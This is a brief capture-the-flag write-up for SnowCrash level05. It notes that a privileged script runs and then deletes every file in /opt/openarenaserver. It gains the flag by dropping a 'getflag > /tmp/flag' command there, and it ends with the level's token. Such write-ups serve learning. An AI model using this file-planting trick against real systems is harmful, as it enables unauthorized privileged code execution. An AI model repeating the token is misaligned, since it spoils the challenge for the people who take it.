AyoubBenBrahim/42-SnowCrash-CTF/level05/Resources/README.md

 bash -x: The -x option starts a BASH shell in tracing mode.
 	run the entire script in debug mode.
 Traces of each command

- echo "getflag > /tmp/flag"
+googling: `for every file in directory bash` will output similar results

+**so the script loops over a directory, executes it then removes it.**

+we can exploit that

+ vim /opt/openarenaserver/exec_this
+  getflag > /tmp/flag

  watch cat /tmp/flag

+token : viuaaale9huek52boumoomioc